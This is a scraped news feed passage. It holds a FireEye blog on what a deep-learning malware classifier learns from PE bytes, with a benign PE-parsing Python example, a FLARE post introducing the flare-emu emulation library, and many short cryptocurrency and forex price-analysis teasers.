We can also examine the activation trends among the convolutional filters by plotting the top-100 activations for each filter across our 4,000 PE files, as shown in Figure 4. Here, we validate our intuition that some of these filters are overwhelmingly associated with features found in our malware samples. In this case, the activations for Filter 57 occur almost exclusively in the malware set, so that will be an important filter to look at later in our analysis. The other main takeaway from the distribution of filter activations is that the distribution is quite skewed, with only two filters handling the majority of activations at this level in our architecture. In fact, some filters are not activated at all on the set of 4,000 files we are analyzing.


Figure 4: Distribution of activations over each of the 96 low-level convolutional filters. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right).

Now that we have identified the most interesting and active filters, we can disassemble the areas surrounding their activation locations and see if we can tease out some trends. In particular, we are going to look at Filters 83 and 57, both of which were important filters in our model based on activation value. The disassembly results for these filters across several of our ransomware artifacts are shown in Figure 5.

For Filter 83, the trend in activations becomes pretty clear when we look at the ASCII encoding of the bytes, which shows that the filter has learned to detect certain types of imports. If we look closer at the activations (denoted with a ‘*’), these always seem to include characters like ‘r’, ‘s’, ‘t’, and ‘e’, all of which were identified as outliers or found in their own unique clusters during our embedding analysis. When we look at the disassembly of Filter 57’s activations, we see another clear pattern, where the filter activates on sequences containing multiple push instructions and a call instruction – essentially, identifying function calls with multiple parameters.

In some ways, we can look at Filters 83 and 57 as detecting two sides of the same overarching behavior, with Filter 83 detecting the imports and 57 detecting the potential use of those imports (i.e., by fingerprinting the number of parameters and usage). Due to the independent nature of convolutional filters, the relationships between the imports and their usage (e.g., which imports were used where) are lost, and the classifier treats these as two completely independent features.


Figure 5: Example disassembly of activations for filters 83 (Left) and 57 (Right) from ransomware samples. Lines prepended with '*' contain the actual filter activations, others are provided for context.

Aside from the import-related features described above, our analysis also identified some filters that keyed in on particular byte sequences found in functions containing exploit code, such as DoublePulsar or EternalBlue. For instance, Filter 94 activated on portions of the EternalRomance exploit code from the BadRabbit artifact we analyzed. Note that these low-level filters did not necessarily detect the specific exploit activity; instead, they activated on byte sequences within the surrounding code in the same function.

These results indicate that the classifier has learned some very specific byte sequences related to ASCII text and instruction usage that relate to imports, function calls, and artifacts found within exploit code. This finding is surprising because in other machine learning domains, such as images, low-level filters often learn generic, reusable features across all classes.

Bird’s Eye View of End-to-End Features

While it seems that lower layers of our CNN classifier have learned particular byte sequences, the larger question is: does the depth and complexity of our classifier (i.e., the number of layers) help us extract more meaningful features as we move up the hierarchy? To answer this question, we have to examine the end-to-end relationships between the classifier’s decision and each of the input bytes. This allows us to directly evaluate each byte (or segment thereof) in the input sequence and see whether it pushed the classifier toward a decision of malware or goodware, and by how much. To accomplish this type of end-to-end analysis, we leverage the SHapley Additive exPlanations (SHAP) framework developed by Lundberg and Lee. In particular, we use the GradientSHAP method that combines a number of techniques to precisely identify the contributions of each input byte, with positive SHAP values indicating areas that can be considered to be malicious features and negative values for benign features.

After applying the GradientSHAP method to our ransomware dataset, we noticed that many of the most important end-to-end features were not directly related to the types of specific byte sequences that we discovered at lower layers of the classifier. Instead, many of the end-to-end features that we discovered mapped closely to features developed from manual feature engineering in our traditional ML models. As an example, the end-to-end analysis on our ransomware samples identified several malicious features in the checksum portion of the PE header, which is commonly used as a feature in traditional ML models. Other notable end-to-end features included the presence or absence of certain directory information related to certificates used to sign the PE files, anomalies in the section table that define the properties of the various sections of the PE file, and specific imports that are often used by malware (e.g., GetProcAddress and VirtualAlloc).

In Figure 6, we show the distribution of SHAP values across the file offsets for the worm artifact of the WannaCry ransomware family. Many of the most important malicious features found in this sample are focused in the PE header structures, including previously mentioned checksum and directory-related features. One particularly interesting observation from this sample, though, is that it contains another PE file embedded within it, and the CNN discovered two end-to-end features related to this. First, it identified an area of the section table that indicated the ‘.data’ section had a virtual size that was more than 10x larger than the stated physical size of the section. Second, it discovered maliciously-oriented imports and exports within the embedded PE file itself. Taken as a whole, these results show that the depth of our classifier appears to have helped it learn more abstract features and generalize beyond the specific byte sequences we observed in the activations at lower layers.


Figure 6: SHAP values for file offsets from the worm artifact of WannaCry. File offsets with positive values are associated with malicious end-to-end features, while offsets with negative values are associated with benign features.
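Two pieces of the analysis above are mechanical enough to show in code: mapping an activation or attribution at a raw file offset back to the PE region it falls in (the HEADER / section name / NULL / UNKNOWN labels of Figure 3), and checking the section table for the kind of inconsistency the end-to-end analysis surfaced in the WannaCry worm (a ‘.data’ section whose virtual size dwarfs its raw size). The following is an added example, not FireEye’s tooling or PEFile: it parses only the DOS stub, COFF header and section table with `struct`, and it runs offline against a constructed two-section PE image and a constructed vector of per-offset attribution scores standing in for real SHAP output. The field layouts are the documented PE ones; the section names, sizes and score values are made up for the example.

```python
import struct
from collections import defaultdict

SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes
COFF_HDR = "<HHIIIHH"           # IMAGE_FILE_HEADER, 20 bytes


def build_sample_pe(sections, opt_header_size=224):
    """Constructed PE image for the example: DOS header with e_lfanew, 'PE\\0\\0',
    COFF header, a zero-filled PE32 optional header and the section table.
    Section bodies are zero-filled; this is sample input, not a real file."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", e_lfanew)          # e_lfanew lives at 0x3C
    coff = struct.pack(COFF_HDR, 0x14C, len(sections), 0, 0, 0, opt_header_size, 0x102)
    table = b"".join(
        struct.pack(SECTION_HDR, s["name"].ljust(8, b"\x00"), s["vsize"], s["vaddr"],
                    s["rawsize"], s["rawptr"], 0, 0, 0, 0, s["flags"])
        for s in sections)
    header = dos + b"PE\x00\x00" + coff + b"\x00" * opt_header_size + table
    image = bytearray(max(s["rawptr"] + s["rawsize"] for s in sections))
    image[:len(header)] = header
    return bytes(image)


def parse_sections(data: bytes):
    """Return (sections, headers_end). Only the fields this analysis needs are kept."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE file")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]          # NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]     # SizeOfOptionalHeader
    table = e_lfanew + 4 + 20 + opt_size
    sections = []
    for i in range(nsec):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            SECTION_HDR, data, table + 40 * i)
        sections.append({"name": name.rstrip(b"\x00").decode("latin-1"), "vsize": vsize,
                         "vaddr": vaddr, "rawsize": rawsize, "rawptr": rawptr, "flags": flags})
    return sections, table + 40 * nsec


def locate_offset(sections, headers_end, file_len, offset):
    """Label a raw file offset the way Figure 3 does: HEADER, a section name,
    NULL for an unnamed section, UNKNOWN for anything outside the declared layout
    (slack between regions, or the padding past the end of the file)."""
    if offset < 0 or offset >= file_len:
        return "UNKNOWN"
    if offset < headers_end:
        return "HEADER"
    for s in sections:
        if s["rawsize"] and s["rawptr"] <= offset < s["rawptr"] + s["rawsize"]:
            return s["name"] or "NULL"
    return "UNKNOWN"


def section_size_anomalies(sections, ratio=10):
    """Names of sections whose VirtualSize exceeds SizeOfRawData by more than `ratio`,
    the inconsistency the end-to-end features flagged in the WannaCry worm's .data."""
    return [s["name"] for s in sections if s["rawsize"] and s["vsize"] > ratio * s["rawsize"]]


def aggregate_by_region(sections, headers_end, file_len, values):
    """Sum per-offset attribution scores (one float per byte, e.g. SHAP values) per region,
    so a plot like Figure 6 can be read as 'how much did each part of the file contribute'."""
    totals = defaultdict(float)
    for offset, value in enumerate(values):
        totals[locate_offset(sections, headers_end, file_len, offset)] += value
    return dict(totals)


# Constructed sample: .data claims 0x3000 bytes in memory but carries only 0x200 on disk.
SAMPLE_SECTIONS = [
    {"name": b".text", "vsize": 0x200, "vaddr": 0x1000, "rawsize": 0x200, "rawptr": 0x200, "flags": 0x60000020},
    {"name": b".data", "vsize": 0x3000, "vaddr": 0x2000, "rawsize": 0x200, "rawptr": 0x400, "flags": 0xC0000040},
]
SAMPLE_PE = build_sample_pe(SAMPLE_SECTIONS)


def constructed_attributions(file_len):
    """Made-up attribution vector: a positive score on the optional header's CheckSum field
    (offset e_lfanew + 24 + 64 for PE32), a negative one in .text, two positives in .data."""
    values = [0.0] * file_len
    values[0x40 + 24 + 64] = 0.8
    values[0x210] = -0.3
    values[0x410] = 0.5
    values[0x411] = 0.5
    return values


if __name__ == "__main__":
    secs, hdr_end = parse_sections(SAMPLE_PE)
    print("size anomalies:", section_size_anomalies(secs))
    print("per-region totals:", aggregate_by_region(secs, hdr_end, len(SAMPLE_PE),
                                                    constructed_attributions(len(SAMPLE_PE))))
```

Sections that hold uninitialized data can legitimately report a VirtualSize far larger than their on-disk size, so `section_size_anomalies` yields a feature for a model or an analyst to weigh, not a verdict on its own.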

Summary

In this blog post, we dove into the inner workings of FireEye’s byte-based deep learning classifier in order to understand what it, and other deep learning classifiers like it, are learning about malware from its unstructured raw bytes. Through our analysis, we have gained insight into a number of important aspects of the classifier’s operation, weaknesses, and strengths:

  • Import Features: Import-related features play a large role in classifying malware across all levels of the CNN architecture. We found evidence of ASCII-based import features in the embedding layer, low-level convolutional features, and end-to-end features.
  • Low-Level Instruction Features: Several features discovered at the lower layers of our CNN classifier focused on sequences of instructions that capture specific behaviors, such as particular types of function calls or code surrounding certain types of exploits. In many cases, these features were primarily associated with malware, which runs counter to the typical use of CNNs in other domains, such as image classification, where low-level features capture generic aspects of the data (e.g., lines and simple shapes). Additionally, many of these low-level features did not appear in the most malicious end-to-end features.
  • End-to-End Features: Perhaps the most interesting result of our analysis is that many of the most important maliciously-oriented end-to-end features closely map to common manually-derived features from traditional ML classifiers. Features like the presence or absence of certificates, obviously mangled checksums, and inconsistencies in the section table do not have clear analogs to the lower-level features we uncovered. Instead, it appears that the depth and complexity of our CNN classifier plays a key role in generalizing from specific byte sequences to meaningful and intuitive features.

It is clear that deep learning offers a promising path toward sustainable, cutting-edge malware classification. At the same time, significant improvements will be necessary to create a viable real-world solution that addresses the shortcomings discussed in this article. The most important next step will be improving the architecture to include more information about the structural, semantic, and syntactic context of the executable rather than treating it as an unstructured byte sequence. By adding this specialized domain knowledge directly into the deep learning architecture, we allow the classifier to focus on learning relevant features for each context, inferring relationships that would not be possible otherwise, and creating even more robust end-to-end features with better generalization properties.

The content of this blog post is based on research presented at the Conference on Applied Machine Learning for Information Security (CAMLIS) in Washington, DC on Oct. 12-13, 2018. Additional material, including slides and a video of the presentation, can be found on the conference website.

Cardano Price Analysis: ADA Moving Within A Deadly Range Block

ADA remains vulnerable to further downside pressure, and there is potential for another 50% drop. IOHK launch two new Cardano tools, ‘Plutus’ and Marlowe for smart contract writing. Cardano’s ADA price has been very much depressed for the past five weeks now, dropping well over 60% within this period. As a result, ADA/BTC has […]

The post Cardano Price Analysis: ADA Moving Within A Deadly Range Block appeared first on Hacked: Hacking Finance.

Forex Update: Dollar Drops, Risk-On Currencies Rally on Trade Optimism

Forex Market Snapshot Asset Current Value Daily Change EUR/USD 1.1366 0.43% GBP/USD 1.2634 1.19% USD/JPY 113.25 -0.10% AUD/USD 0.7223 0.26% GOLD 1,249 0.09% WTI Crude Oil 52.16 0.37% BTC/USD 3,444 2.74% The forex market saw another very active session, with the key topics of the recent weeks still making headlines and causing wild swings in […]

The post Forex Update: Dollar Drops, Risk-On Currencies Rally on Trade Optimism appeared first on Hacked: Hacking Finance.

Zcash Price Analysis: ZEC/USD Shaping Up for Another Potential Fall; Coinbase Giving Zcash Away

Zcash saw a decent bounce on Wednesday, jumping over 6%, but technically there are still some vulnerabilities. Coinbase, as part of their ‘12 days of Coinbase’ campaign, will be giving away ZEC to families in need in Venezuela. ZEC/USD enjoyed a string of gains on Wednesday, jumping as much as 6% in the session. […]

The post Zcash Price Analysis: ZEC/USD Shaping Up for Another Potential Fall; Coinbase Giving Zcash Away appeared first on Hacked: Hacking Finance.

Crypto Update: Another Rally Attempt in Crypto-Land

The major cryptocurrencies are all trading slightly higher today, following two bearish days that brought them back to last week lows, and for now, another breakdown has been avoided, despite the overwhelmingly bearish broader picture. The modest bounce left our trend model on sell signals across the board, and odds continue to favor new lows […]

The post Crypto Update: Another Rally Attempt in Crypto-Land appeared first on Hacked: Hacking Finance.

FLARE Script Series: Automating Objective-C Code Analysis with Emulation

This blog post is the next episode in the FireEye Labs Advanced Reverse Engineering (FLARE) team Script Series. Today, we are sharing a new IDAPython library – flare-emu – powered by IDA Pro and the Unicorn emulation framework that provides scriptable emulation features for the x86, x86_64, ARM, and ARM64 architectures to reverse engineers. Along with this library, we are also sharing an Objective-C code analysis IDAPython script that uses it. Read on to learn some creative ways that emulation can help solve your code analysis problems and how to use our new IDAPython library to save you lots of time in the process.

Why Emulation?

If you haven’t employed emulation as a means to solve a code analysis problem, then you are missing out! I will highlight some of its benefits and a few use cases in order to give you an idea of how powerful it can be. Emulation is flexible, and many emulation frameworks available today, including Unicorn, are cross-platform. With emulation, you choose which code to emulate and you control the context under which it is executed. Because the emulated code cannot access the system services of the operating system under which it is running, there is little risk of it causing damage. All of these benefits make emulation a great option for ad-hoc experimentation, problem solving, or automation.

Use Cases

  • Decoding/Decryption/Deobfuscation/Decompression – Often during malicious code analysis you will come across a function used to decode, decompress, decrypt, or deobfuscate some useful data such as strings, configuration data, or another payload. If it is a common algorithm, you may be able to identify it by sight or with a plug-in such as signsrch. Unfortunately, this is not often the case. You are then left either to open up a debugger and instrument the sample to decode it for you, or to transpose the function by hand into whatever programming language fits your needs at the time. These options can be time consuming and problematic depending on the complexity of the code and the sample you are analyzing. Here, emulation can often provide a preferable third option. Writing a script that emulates the function for you is akin to having the function available to you as if you wrote it or are calling it from a library. This allows you to reuse the function as many times as it’s needed, with varying inputs, without having to open a debugger. This case also applies to self-decrypting shellcode, where you can have the code decrypt itself for you.
  • Data Tracking – With emulation, you have the power to stop and inspect the emulation context at any time using an instruction hook. Pairing a disassembler with an emulator allows you to pause emulation at key instructions and inspect the contents of registers and memory. This allows you to keep tabs on interesting data as it flows through a function. This can have several applications. As previously covered in other blogs in the FLARE script series, Automating Function Argument Extraction and Automating Obfuscated String Decoding, this technique can be used to track the arguments passed to a given function throughout an entire program. Function argument tracking is one of the techniques employed by the Objective-C code analysis tool introduced later in this post. The data tracking technique could also be employed to track the this pointer in C++ code in order to markup object member references, or the return values from calls to GetProcAddress/dlsym in order to rename the variables they are stored in appropriately. There are many possibilities.

Introducing flare-emu

The FLARE team is introducing an IDAPython library, flare-emu, that marries IDA Pro’s binary analysis capabilities with Unicorn’s emulation framework to provide the user with an easy to use and flexible interface for scripting emulation tasks. flare-emu is designed to handle all the housekeeping of setting up a flexible and robust emulator for its supported architectures so that you can focus on solving your code analysis problems. It currently provides three different interfaces to serve your emulation needs, along with a slew of related helper and utility functions.

  1. emulateRange – This API is used to emulate a range of instructions, or a function, within a user-specified context. It provides options for user-defined hooks for both individual instructions and for when “call” instructions are encountered. The user can decide whether the emulator will skip over or call into function calls. Figure 1 shows emulateRange used with both an instruction and call hook to track the return value of GetProcAddress calls and rename global variables to the name of the Windows APIs they will be pointing to. In this example, it was only set to emulate from 0x401514 to 0x40153D. This interface provides an easy way for the user to specify values for given registers and stack arguments. If a bytestring is specified, it is written to the emulator’s memory and the pointer is written to the register or stack variable. After emulation, the user can make use of flare-emu’s utility functions to read data from the emulated memory or registers, or use the Unicorn emulation object that is returned for direct probing in case flare-emu does not expose some functionality you require.

    A small wrapper function for emulateRange, named emulateSelection, can be used to emulate the range of instructions currently highlighted in IDA Pro.


    Figure 1: emulateRange being used to track the return value of GetProcAddress

  2. iterate – This API is used to force emulation down specific branches within a function in order to reach a given target. The user can specify a list of target addresses, or the address of a function from which a list of cross-references to the function is used as the targets, along with a callback for when a target is reached. The targets will be reached, regardless of conditions during emulation that may have caused different branches to be taken. Figure 2 illustrates a set of code branches that iterate has forced to be taken in order to reach its target; the flags set by the cmp instructions are irrelevant. Like the emulateRange API, options for user-defined hooks for both individual instructions and for when “call” instructions are encountered are provided. An example use of the iterate API is for the function argument tracking technique mentioned earlier in this post.


    Figure 2: A path of emulation determined by the iterate API in order to reach the target address

  3. emulateBytes – This API provides a way to simply emulate a blob of extraneous shellcode. The provided bytes are not added to the IDB and are simply emulated as is. This can be useful for preparing the emulation environment. For example, flare-emu itself uses this API to manipulate a Model Specific Register (MSR) for the ARM64 CPU that is not exposed by Unicorn in order to enable Vector Floating Point (VFP) instructions and register access. Figure 3 shows the code snippet that achieves this. Like with emulateRange, the Unicorn emulation object is returned for further probing by the user in case flare-emu does not expose some functionality required by the user.


    Figure 3: flare-emu using emulateBytes to enable VFP for ARM64

API Hooking

As previously stated, flare-emu is designed to make it easy for you to use emulation to solve your code analysis needs. One of the pains of emulation is in dealing with calls into library functions. While flare-emu gives you the option to simply skip over call instructions, or define your own hooks for dealing with specific functions within your call hook routine, it also comes with predefined hooks for over 80 functions! These functions include many of the common C runtime functions for string and memory manipulation that you will encounter, as well as some of their Windows API counterparts.

Examples

Figure 4 shows a few blocks of code that call a function that takes a timestamp value and converts it to a string. Figure 5 shows a simple script that uses flare-emu’s iterate API to print the arguments passed to this function for each place it is called. The script also emulates a simple XOR decode function and prints the resulting, decoded string. Figure 6 shows the resulting output of the script.


Figure 4: Calls to a timestamp conversion function


Figure 5: Simple example of flare-emu usage


Figure 6: Output of script shown in Figure 5

Here is a sample script that uses flare-emu to track return values of GetProcAddress and rename the variables they are stored in accordingly. Check out our README for more examples and help with flare-emu.

Introducing objc2_analyzer

Last year, I wrote a blog post to introduce you to reverse engineering Cocoa applications for macOS. That post included a short primer on how Objective-C methods are called under the hood, and how this adversely affects cross-references in IDA Pro and other disassemblers. An IDAPython script named objc2_xrefs_helper was also introduced in the post to help fix these cross-reference issues. If you have not read that blog post, I recommend reading it before continuing with this post, as it provides some context for what makes objc2_analyzer particularly useful. A major shortcoming of objc2_xrefs_helper was that if a selector name was ambiguous, meaning that two or more classes implement a method with the same name, the script was unable to determine which class the referenced selector belonged to at any given location in the binary and had to ignore such cases when fixing cross-references.

Now, with emulation support, this is no longer the case. objc2_analyzer uses the iterate API from flare-emu along with instruction and call hooks that perform Objective-C disassembly analysis in order to determine the id and selector being passed for every call to objc_msgSend variants in a binary. As an added bonus, it can also catch calls made to objc_msgSend variants when the function pointer is stored in a register, which is a very common pattern in Clang (the compiler used by modern versions of Xcode). IDA Pro tries to catch these itself and does a pretty good job, but it doesn’t catch them all. In addition to x86_64, support was also added for the ARM and ARM64 architectures in order to support reverse engineering iOS applications. This script supersedes the older objc2_xrefs_helper script, which has been removed from our repo. And, since the script can perform such data tracking in Objective-C code by using emulation, it can also determine whether an id is a class instance or a class object itself. Additional support has been added to track ivars being passed as ids as well. With all this information, Objective-C-style pseudocode comments are added to each call to objc_msgSend variants that represent the method call being made at each location. An example of the script’s capability is shown in Figure 7 and Figure 8.


Figure 7: Objective-C IDB snippet before running objc2_analyzer


Figure 8: Objective-C IDB snippet after running objc2_analyzer

Observe that the instructions referencing selectors have been patched to instead reference the implementation function itself, for easy transition. The comments added to each call make analysis much easier. Cross-references from the implementation functions are also created to point back to the objc_msgSend calls that reference them, as shown in Figure 9.


Figure 9: Cross-references added to IDB for implementation function

It should be noted that every release of IDA Pro starting with 7.0 has brought improvements to Objective-C code analysis and handling. However, at the time of writing, with the latest version of IDA Pro being 7.2, there are still shortcomings that are mitigated by this tool, in addition to the immensely helpful comments that it adds. objc2_analyzer is available, along with our other IDA Pro plugins and scripts, at our GitHub page.

Conclusion

flare-emu is a flexible tool to include in your arsenal that can be applied to a variety of code analysis problems. Several example problems were presented and solved using it in this blog post, but this is just a glimpse of its possible applications. If you haven’t given emulation a try for solving your code analysis problems, we hope you will now consider it an option. And for all, we hope you find value in using these new tools!

NEM Update: Good Time to Buy the Dip

What would you think if we told you that NEM (XEM/BTC) is a crypto leader in terms of chart analysis? Many would think that this statement is preposterous. After all, the market is still down by 85% from the 2018 peak of 0.000137. In September, it was even down further by over 90% when it […]

The post NEM Update: Good Time to Buy the Dip appeared first on Hacked: Hacking Finance.

EOS Price Analysis: Cardano Founder Charles Hoskinson Warns of Regulatory Action Against EOS

Charles Hoskinson projects some form of action from the SEC on EOS. EOS/USD enjoys a relief rally on Wednesday, as price moves further north following recent bounce. The EOS price hasn’t done much but decline of late. Back in August, EOS/USD entered into a very stubborn narrowing range. The price had been confined within this […]

The post EOS Price Analysis: Cardano Founder Charles Hoskinson Warns of Regulatory Action Against EOS appeared first on Hacked: Hacking Finance.

Forex Update: Euro and Pound Under Pressure Amid Brexit Chaos

Forex Market Snapshot Asset Current Value Daily Change EUR/USD 1.1318 -0.32% GBP/USD 1.2515 -0.35% USD/JPY 113.27 -0.04% AUD/USD 0.7200 0.14% GOLD 1,247 -0.23% WTI Crude Oil 51.63 1.43% BTC/USD 3,336 -2.10% The forex market has been very active today with Europe being in the epicenter of the moves. The Euro and the Great British Pound […]

The post Forex Update: Euro and Pound Under Pressure Amid Brexit Chaos appeared first on Hacked: Hacking Finance.

Stellar Price Analysis: XLM/USD on the Road to Losing the $0.10 Mark; Coinbase Can’t Save XLM for Now

XLM bears are pressing hard for a drop below the big $0.10 mark, as markets remain down across the board. There could be room for another 8% price drop if support is broken, looking via the XLM/BTC chart view. Stellar’s XLM is subject to giving up the big $0.10 level. Across the board there have […]

The post Stellar Price Analysis: XLM/USD on the Road to Losing the $0.10 Mark; Coinbase Can’t Save XLM for Now appeared first on Hacked: Hacking Finance.

Crypto Update: New Lows in Sight Again as Slide Continues

The cryptocurrency segment continues to be under heavy selling pressure following the weekend rally attempt, and although all of the majors are still above last week’s lows, the strong short-term downtrend remains dominant. The long-term picture is overwhelmingly bearish as well, and there are coins showing meaningful relative strength, so sellers are clearly still […]

The post Crypto Update: New Lows in Sight Again as Slide Continues appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: ETH/USD is a Sitting Duck Under $100; with Jitters Heading into Constantinople Upgrade

ETH/USD is subject to further downside, as the price produces another range-block. There is some nervous anticipation across the community heading into the Constantinople upgrade. ETH/USD is a sitting duck underneath the big psychological $100 mark. Just like every other cryptocurrency, Ethereum (ETH) remains firmly on the back foot. Over the past five weeks, the […]

The post Ethereum Price Analysis: ETH/USD is a Sitting Duck Under $100; with Jitters Heading into Constantinople Upgrade appeared first on Hacked: Hacking Finance.

Crypto Update: Weekend Bounce Fails to Turn Bearish Tide

The major cryptocurrencies continue to be stuck in declining trends, despite the bounce that followed the latest technical breakdown in the segment. The top coins failed to recover above the prior bear market lows sustainably, and today, the market turned lower again, with the weakest currencies already threatening new lows. The long-term picture remains […]

The post Crypto Update: Weekend Bounce Fails to Turn Bearish Tide appeared first on Hacked: Hacking Finance.

Litecoin Price Analysis: If Current Demand Zone Fails to Hold Then Next Stop Is $3

LTC/USD is in serious danger of another hard fall should the range-block seen be breached. Back in December 2013, the price was at current levels and fell down to $1 over a two-year period. Litecoin has been heavily weighted to the downside of late. The selling pressure intensified through the month of November. This month, […]

The post Litecoin Price Analysis: If Current Demand Zone Fails to Hold Then Next Stop Is $3 appeared first on Hacked: Hacking Finance.

USD Has Found Itself Among Outsiders

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets There are a lot of factors weighing on the US dollar as of late. EURUSD skyrocketed towards the highs it reached on November 20th, as the currency market was overwhelmed by another wave of “escaping-from-the American-currency” investors. It wouldn’t be right to say that there was one particular […]

The post USD Has Found Itself Among Outsiders appeared first on Hacked: Hacking Finance.

XRP Price Analysis: XRP/USD Behavior Suggests of One More Deep Pullback

XRP/USD price action is moving within a range-block, subject to an extended move lower. American Express are singing praises about the speed of Ripple’s technology. XRP/USD price has stabilized, after the renewed chunky wave of selling pressure that hit the market. The price last week was forced to drop a whopping 30%. This came following […]

The post XRP Price Analysis: XRP/USD Behavior Suggests of One More Deep Pullback appeared first on Hacked: Hacking Finance.

Dash Price Analysis: DASH Sees Change in Sentiment, with Help from KFC Adoption Announcement

KFC to start accepting DASH payments in Venezuela, as adoption across the country continues. DASH/USDT has seen a firm bounce, producing a daily hammer candlestick, indicating a reversal on the cards. DASH/USDT has bounced over the past three sessions, a promising change from the bearish sentiment seen. Through the month of November, which was […]

The post Dash Price Analysis: DASH Sees Change in Sentiment, with Help from KFC Adoption Announcement appeared first on Hacked: Hacking Finance.

Cardano Price Analysis: ADA Subject to Further Downside, Despite Charles Hoskinson Singing Praises of Progress

Cardano founder, Charles Hoskinson, said, “Cardano’s future is looking very bright!” in a tweet update. ADA/USDT is back within consolidation mode, ahead of another potential squeeze to the downside. Cardano’s native token ADA remains under heavy pressure to the downside. The pickup in momentum lower, which came in November, has seen the price fall over 60%. […]

The post Cardano Price Analysis: ADA Subject to Further Downside, Despite Charles Hoskinson Singing Praises of Progress appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: ETH/USD Spikes 17% as Constantinople Set to Launch in Jan; $60 Still in Sight

Ethereum developers report that Constantinople hard fork is estimated on 16th January 2019. ETH/USD could be driven down further to May 2017 low, around the $60 territory. Constantinople Set for January Implementation ETH/USD in the late part of trading on Friday surged some chunky 17%. An update on the highly anticipated Constantinople hard fork launch […]

The post Ethereum Price Analysis: ETH/USD Spikes 17% as Constantinople Set to Launch in Jan; $60 Still in Sight appeared first on Hacked: Hacking Finance.

Crypto Update: Sell-Off Deepens as Majors Break Key Levels

The past 24 hours saw another crucial bearish move in the cryptocurrency segment, with the majority of the top coins violating their prior bear market lows and starting another leg lower in the damaging downtrend. Even the relatively stronger coins turned bearish in our trend model with regards to the short-term time-frame while staying bearish […]

The post Crypto Update: Sell-Off Deepens as Majors Break Key Levels appeared first on Hacked: Hacking Finance.

Bitcoin Update: Bear Market Bottom Ahead

Bitcoin (BTC/USD), as well as most cryptos, are getting wrecked as we speak. Many are panic selling as the market is down by close to 50% in less than a month. On top of that, it seems that a fresh yearly low is printed with every passing minute. Bears look unstoppable as calls for Bitcoin’s […]

The post Bitcoin Update: Bear Market Bottom Ahead appeared first on Hacked: Hacking Finance.

Tron Price Analysis: Justin Sun Makes Offer to EOS and ETH Developers; TRX/USD Outperforms

TRX has been outperforming its peers in the session on Friday, within a sea of red. Tron founder Justin Sun makes an offer to EOS and ETH developers. The Tron price is witnessing a decent bounce to the upside in comparison to many of its peers. Gains of some 3% in the session on Friday have […]

The post Tron Price Analysis: Justin Sun Makes Offer to EOS and ETH Developers; TRX/USD Outperforms appeared first on Hacked: Hacking Finance.

XRP Price Analysis: XRP/USD Finally Approaching the Real Big Bull Buying Levels

XRP/USD tanks to drop below the $0.3000 mark, its lowest level since September. Eyes are on the big bull buying area of $0.3000-$0.2000. Historically, this level has seen large interest come into play. XRP/USD was slammed aggressively this week, as selling pressure heavily intensified late Thursday into Friday. The market resuming the chunky downside […]

The post XRP Price Analysis: XRP/USD Finally Approaching the Real Big Bull Buying Levels appeared first on Hacked: Hacking Finance.

Stellar Price Analysis: XLM/USD Bears Tear Through Critical Support

XLM/USD has had its recent bottom area firmly breached by the market bears. XLM/BTC suggests there is still some further room for another squeeze to the downside. Stellar Lumens is really heading to no man’s land. XLM/USD is running at its fifth consecutive session in the red, dropping a chunky 25% within this period. The selling pressure […]

The post Stellar Price Analysis: XLM/USD Bears Tear Through Critical Support appeared first on Hacked: Hacking Finance.

Crypto Update: Altcoins Remain Under Pressure as Bitcoin Holds Support

The cryptocurrency segment continues to trade with a bearish bias, with almost all majors challenging their bear market lows in the past 24 hours. While a broad breakdown has been avoided so far, in the case of the top coins, there is still no sign of meaningful bullish momentum or a developing leadership, so odds […]

The post Crypto Update: Altcoins Remain Under Pressure as Bitcoin Holds Support appeared first on Hacked: Hacking Finance.

Ethereum Update: Santa Rally Possibly in the Works

Ethereum (ETH/BTC) is down by over 77% from the 2018 high of 0.12282435 in February 2018. At that point, the market has plummeted so deeply that we’ve reached whale territory. Ethereum is trading at price levels where high roller wallets are on the move. On November 30 alone, more than half a billion dollars worth […]

The post Ethereum Update: Santa Rally Possibly in the Works appeared first on Hacked: Hacking Finance.

Maker Price Analysis: MKR/USD Jumps 6%, While Rest of the Market Slumps

Maker is outperforming most of its peers with the recent gains produced. The surge higher has put MKR into the top 20 cryptocurrencies by market cap. Maker (MKR) initially made solid gains as much as 6% on Tuesday before cooling. This move was very much out-performing the rest of the market. This being part of […]

The post Maker Price Analysis: MKR/USD Jumps 6%, While Rest of the Market Slumps appeared first on Hacked: Hacking Finance.

Bitcoin Cash Price Analysis: BCH/USD Tumbles Further into the Abyss, and Not Even Roger Ver Can Save it

BCH/USD has broken the recent bottom area of $150, making room for another wave of selling. Roger Ver, speaking to Bloomberg in Tokyo, was bullish on the long-term fundamentals of cryptocurrencies in general. The Bitcoin Cash price continues to get slammed by the market bears, with a lack of mercy being shown. BCH/USD is currently […]

The post Bitcoin Cash Price Analysis: BCH/USD Tumbles Further into the Abyss, and Not Even Roger Ver Can Save it appeared first on Hacked: Hacking Finance.

Crypto Update: Bitcoin Eyes $4000 as Consolidation Continues

The crypto-segment is having a positive day so far today, with the top coins all being higher, recovering a large part of yesterday’s losses. While the major cryptocurrencies still don’t show signs of strong bullish momentum, and the market is clearly controlled by sellers, the declining volatility of the recent period is an encouraging […]

The post Crypto Update: Bitcoin Eyes $4000 as Consolidation Continues appeared first on Hacked: Hacking Finance.

IOTA Price Analysis: IOTA Announce Another New Partnership, but Bulls Must Breakout from Bearish Set-Up

IOTA announces new collaboration with RIDDLE&CODE for transactions on IOTA Tangle. Bearish technical set up is still eyed for IOT/USD; bulls must breakout, or be punished. IOTA Collaborates with RIDDLE&CODE A new partnership has recently been announced from the IOTA Foundation with RIDDLE&CODE, a blockchain-based hardware and software company. This collaboration is set to facilitate transactions […]

The post IOTA Price Analysis: IOTA Announce Another New Partnership, but Bulls Must Breakout from Bearish Set-Up appeared first on Hacked: Hacking Finance.

General Motors Fires 27,000 People, Stock Jumps by 5%

